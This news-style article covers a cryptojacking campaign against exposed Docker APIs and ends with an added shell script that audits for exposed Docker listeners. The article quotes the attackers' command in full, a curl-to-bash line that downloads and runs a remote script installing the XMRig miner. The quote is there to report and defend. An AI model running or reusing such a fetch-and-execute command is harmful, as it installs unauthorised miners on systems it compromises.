Vulnerable Docker Instance Sought Out by Monero Malware
Near the end of November it was discovered that some Docker instances were vulnerable to a specific attack vector that allowed the injection of Monero mining programs. During the two days the campaign was live, over 14.82 XMR was mined. That amount translates to roughly $800.00 USD.
Although that amount wasn't enough to turn heads, what was significant about this vulnerability was the number of scans that occurred. During that campaign, hackers scanned up to 59,000 IP networks for exposed API endpoints. Once attackers located an exposed endpoint, an Alpine Linux OS container was deployed to run chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;' (a command that downloads a bash script which installs the XMRig cryptocurrency miner).
The issue was discovered by security firm Bad Packets LLC, which also found the malware contained a self-defense measure that not only disables security, but shuts down processes associated with rival cryptocurrency-mining botnets.
To avoid such a vulnerability, Troy Mursch (co-founder and Chief Research Officer of Bad Packets LLC) says Docker container admins should immediately check to see if they are exposing API endpoints to the internet. If so, admins should close exposed ports and stop/delete any unrecognized containers.
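A shell audit for the check Mursch recommends, added here as an example (not code from the article or from Bad Packets). It assumes the listener format of `ss -tlnp` (field 4 is Local Address:Port) and uses constructed sample lines to show which listeners count as exposed.

```sh
#!/bin/sh
# Added example, not from the article: flag a Docker daemon API listener that is
# bound to an address other than loopback, which is what this campaign scanned for.
# Input lines follow `ss -tlnp` output; the sample below is constructed.

# Exit 0 if the line is a dockerd listener (or one on the usual API ports
# 2375/2376) that is not bound to loopback; exit 1 otherwise.
is_exposed_docker_listener() {
  line=$1
  local_addr=$(printf '%s\n' "$line" | awk '{print $4}')
  case "$line" in
    *dockerd*) ;;                         # process name from the users:(...) column
    *) case "$local_addr" in
         *:2375|*:2376) ;;                # default plain-TCP / TLS API ports
         *) return 1 ;;
       esac ;;
  esac
  case "$local_addr" in
    127.*|'[::1]:'*) return 1 ;;          # loopback only: not reachable remotely
    *) return 0 ;;                        # 0.0.0.0, *, [::] or a LAN/public address
  esac
}

# Read listener lines on stdin, print each exposed one, and print the count
# of exposed listeners as the final line so a caller can capture it.
audit_docker_listeners() {
  count=0
  while IFS= read -r line; do
    if is_exposed_docker_listener "$line"; then
      echo "EXPOSED: $line"
      count=$((count + 1))
    fi
  done
  echo "$count"
}

# Constructed sample: one loopback-only API socket, two exposed ones, and sshd.
SAMPLE_LISTENERS='LISTEN 0 4096 127.0.0.1:2375 0.0.0.0:* users:(("dockerd",pid=812,fd=6))
LISTEN 0 4096 0.0.0.0:2375 0.0.0.0:* users:(("dockerd",pid=812,fd=7))
LISTEN 0 4096 [::]:2376 [::]:* users:(("dockerd",pid=812,fd=8))
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=640,fd=3))'

printf '%s\n' "$SAMPLE_LISTENERS" | audit_docker_listeners   # last line printed: 2

# On a real host, audit the live socket table instead of the sample.
if command -v ss >/dev/null 2>&1; then
  ss -tlnp 2>/dev/null | audit_docker_listeners
fi
```

If anything is reported, close or firewall the port, then review `docker ps -a` and remove containers you do not recognise with `docker rm -f`.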